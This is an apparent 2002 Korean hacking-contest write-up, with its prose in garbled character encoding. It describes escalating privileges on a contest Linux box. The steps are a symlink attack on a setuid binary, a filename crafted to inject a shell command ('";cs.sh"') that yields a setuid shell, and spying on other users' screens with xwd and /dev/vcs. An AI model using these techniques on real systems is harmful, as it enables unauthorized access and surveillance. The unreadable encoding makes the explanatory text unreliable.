::: ´ÙÀ½Àº À̹ø Á¦ 1ȸ Hacking The Linux Contest¿¡¼­ 3À§¸¦ Â÷ÁöÇÑ djNmc ´ÔÀÇ °ø°Ý º¸°í¼­ÀÔ´Ï´Ù. :::

1. ¸®¸ðÆ® ¾îÅÃ

Æ÷Æ®½ºÄµÀ» ÇÑ ÈÄ 8888¹ø Æ÷Æ®¿¡¼­ ¾ÆÀ̵ð¿Í Æнº¿öµå¸¦ ¾Ë¼ö ÀÖ¾ú´Ù.


ID : guest PW : welcome ÀÓÀ» ¾Ë¾Æ³¿.

2. walwal °èÁ¤ ȹµæ.

 

 

bash2-2.05a$ find / -user walwal 2>/dev/null
/var/spool/mail/walwal
/etc/sysconfig/network-scripts/.hidden/GUTAPASSWD.TXT
/bin/SolveMe/HackTheNose.txt
/bin/SolveMe/walwal
/home/walwal

sh-2.05a$ ls -al /bin/SolveMe/
total 28
drwxr-xr-x 2 root root 4096 Aug 16 08:42 .
drwxr-xr-x 3 root root 4096 Aug 16 21:31 ..
-rw-r----- 1 root walwal 143 Aug 16 08:38 HackTheNose.txt
-rwsr-sr-x 1 walwal walwal 14122 Aug 16 08:38 walwal

[guest@localhost Xtreme]$ strings walwal
/lib/ld-linux.so.2
libc.so.6
fgets
malloc
__deregister_frame_info
sprintf
fclose
fopen
_IO_stdin_used
__libc_start_main
__register_frame_info
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
QVh
./HackTheNose.txt <--

 


strings·Î walwalÆÄÀÏÀ» º¸´Ï ./HackTheNose.txt¶ó´Â ¹®ÀåÀ» º¼¼ö ÀÖ¾ú´Ù.

 

 

sh-2.05a$ find / -group walwal 2> /dev/null
/etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT

 


walwalÀÇ Æнº¿öµå°¡ ÀúÀåµÇ¾î ÀÖ´Â ÆÄÀÏÀ» ã¾Ò´Ù.
walwalÀ̶ó´Â ÇÁ·Î±×·¥ÀÌ ½ÇÇàÇÏ´Â µð·ºÅ丮ÀÇ HackTheNose.txt¸¦ Àд´ٴ °¡¼³À» ¼¼¿ì°í
µÎ ÆÄÀÏÀ» ¸µÅ©ÇÏ¿´´Ù.

 

 

[guest@localhost Xtreme]$ ln -sf /etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT ./HackTheNose.txt

[guest@localhost Xtreme]$ ./walwal
¸¶Â¡°¡
[guest@localhost Xtreme]$ su walwal
Password :
[walwal@localhost Xtreme]$

 


3. guta °èÁ¤ ȹµæ.

 

 

[walwal@localhost Xtreme]$ cat >> cs.sh
#!/bin/sh
cp /bin/sh /tmp/xtreme
chmod +s /tmp/xtreme
[walwal@localhost Xtreme]$
[walwal@localhost Xtreme]$ ls
cs.sh
[walwal@localhost Xtreme]$ cd ..
[walwal@localhost tmp]$ ln -s /tmp/Xtreme/cs.sh cs.sh -f
[walwal@localhost tmp]$ chmod 777 /tmp/Xtreme/cs.sh
[walwal@localhost tmp]$ cd ~/
[walwal@localhost walwal]$ cd movie
[walwal@localhost movie]$ date
Thu Aug 18 02:18:10 EDT 2002
[walwal@localhost movie]$ touch 08180112 "\";cs.sh\""
[walwal@localhost movie]$ cd /tmp
[walwal@localhost tmp]$ ls -al xtreme
-rwsr-sr-x 1 guta guta 541096 Aug 22 00:22 xtreme*
[walwal@localhost tmp]$ ./xtreme -p
xtreme-2.05a$ id
uid=1000(walwal) gid=1000(walwal) euid=1001(guta) egid=1001(guta) groups=1000(walwal)
xtreme-2.05a$

 


4. mungmung, wizard °èÁ¤ ȹµæ.

BOF¿¡ ´ëÇÑ Áö½ÄÀÌ ¾ø±â ¶§¹®¿¡ ÀüÇô ¹®Á¦¸¦ ÇØ°áÇÒ¼ö ¾ø¾ú´Ù. ±×·¯´Â µµÁß ÇÁ·Î¼¼½º¸¦ º¸´Ù°¡
HantermÀ» ¶ç¿î Âü°¡ÀÚµéÀÌ ¸¹Àº°É ¹ß°ßÇÏ¿´´Ù. ±×·¡¼­ xwd¶ó´Â X À©µµ ĸÃÄ ÇÁ·Î±×·¥À» ÀÌ¿ë
Âü°¡ÀÚµéÀÇ È­¸éÀ» ĸÃÄÇÏ¿´´Ù. ±×·¯´Â µµÁß mungmung°èÁ¤ÀÇ Æнº¿öµå¿Í. wizard°èÁ¤ÀÇ ¹éµµ¾î
À§Ä¡¸¦ ã¾Æ³»°Ô µÇ¾ú´Ù.

 

 

[root@localhost public_html]$ xwd -display IP:0.0 -root -out outfile
[root@localhost public_html]$ convert outfile outfile.jpg

 



5. °ü¸®ÀÚ Ä¸ÃÄ ¹æ¹ý.

(1) -°¡»ó ÄÜ¼Ö ½ºÅ©¸° ÆÄÀÏ-

 

 

bash-2.05a$ ls -al /dev/vcs*
crw--w---- 1 vcsa tty 7, 0 Apr 11 10:25 /dev/vcs
crw--w-r-- 1 vcsa tty 7, 1 Apr 11 10:25 /dev/vcs1 <--- Àб⠱ÇÇÑÀÌ ÀÖ´Ù.
crw--w---- 1 vcsa tty 7, 10 Apr 11 10:25 /dev/vcs10
crw--w---- 1 vcsa tty 7, 11 Apr 11 10:25 /dev/vcs11
crw--w---- 1 vcsa tty 7, 12 Apr 11 10:25 /dev/vcs12
crw--w---- 1 vcsa tty 7, 13 Apr 11 10:25 /dev/vcs13
crw--w---- 1 vcsa tty 7, 14 Apr 11 10:25 /dev/vcs14
crw--w---- 1 vcsa tty 7, 15 Apr 11 10:25 /dev/vcs15
crw--w---- 1 vcsa tty 7, 16 Apr 11 10:25 /dev/vcs16
crw--w---- 1 vcsa tty 7, 17 Apr 11 10:25 /dev/vcs17
bash-2.05a$ cat /dev/vcs1

[ »ý·« ]
bash-2.05a$

 


(2) -¸®´ª½ºÀÇ xwdÇÁ·Î±×·¥À» »ç¿ë-

ÇÁ·Î¼¼½º È®ÀÎÁß root±ÇÇÑÀ¸·Î hantermÀÌ µ¹¾Æ°¡°í ÀÖ´Â °ÍÀ» ¹ß°ß.

 

 

[root@localhost public_html]$ xwd -display ROOTIP:0.0 -root -out outfile
[root@localhost public_html]$ convert outfile outfile.jpg

 


 

** ÀÔ»óÀÚ¿¡°Ô ÇѸ¶µð!! **

 

 

°¥°¥ÀÌ : xwd°¡Á¶Äï.. .
linu : ³ªµµ ÷ ¾Ë¾Ò´Ù ¤Ñ¤Ñ¤» xwd .
linu : index Çì´õÆÄÀÏ? Á¶ÀÛÇϼ̳ª? -_- index ±Ùóµµ ¸ø°¡º» Àú·Î½á´Â..µµÀúÈ÷ ÀÌÇØ°¡. .
Åä½Ã : ¼ö°íÇϼ̽À´Ï´Ù.(__) .
w0rm9 : ¿ª½Ã °í¼öÀÔ´Ï´Ù. ( __) .
±¸¸£¹Ì : ÃßÄ«ÇØ..Ä«Ä« ¤Ñ¤Ñ;¾¾Æþ ¤Ñ¤Ñ; ¤» -_- .
indra : Àý¶©!!! ¹ä»ç-_- ±¸¸®¹Ìµµ ¹ä»ç!! --; .
peer : -_-; .

 

 

À̸§ :   ³»¿ë :